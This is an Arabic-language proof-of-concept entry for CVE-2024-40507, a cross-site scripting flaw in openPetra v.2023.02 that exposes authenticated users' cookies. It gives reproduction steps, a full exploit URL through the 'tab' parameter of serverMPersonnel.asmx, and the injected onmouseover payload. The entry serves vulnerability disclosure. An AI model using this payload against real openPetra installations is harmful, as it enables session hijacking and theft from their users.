
OpenPetra v.2023.02 استخدام CVE-2024-40507
الوصف: يمكن لمستخدم غير مصادق عليه سرقة ملفات تعريف الارتباط (cookies) من مستخدم مصادق عليه، من خلال استغلال ثغرة XSS في openPetra v.2023.02 عبر دالة serverMPersonnel.asmx.
إصدار المنتج المعرّض للثغرة: openPetra v.2023.02
مؤلف CVE: Jansen Moreira
التاريخ: 13/07/2024
CVE: CVE-2024-40507
رابط CVE: https://www.cve.org/CVERecord?id=CVE-2024-40507
رابط NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-40507
رابط Tenable: https://www.tenable.com/cve/CVE-2024-40507
تم التأكيد في: 13/07/2024
تم الاختبار على: Linux
1- الوصول إلى الصفحة الرئيسية
2- استخدم المسار التالي وأضف حمولة XSS في معامل التبويب (tab). مثال: http://target.com/api/serverMPersonnel.asmx?bnd=TMHospitalityWebServiceSoap&op=THospitalityWebConnector_Dummy&page=op&tab=x" onmouseover=alert(document.cookie) x="
3- مرّر مؤشر الماوس فوق عنصر الفهرس الأيسر لتفعيل ثغرة XSS
الحمولات:
tab: x" onmouseover=alert(document.cookie) x="
المكتشف(ون)/الاعتمادات: Jansen Moreira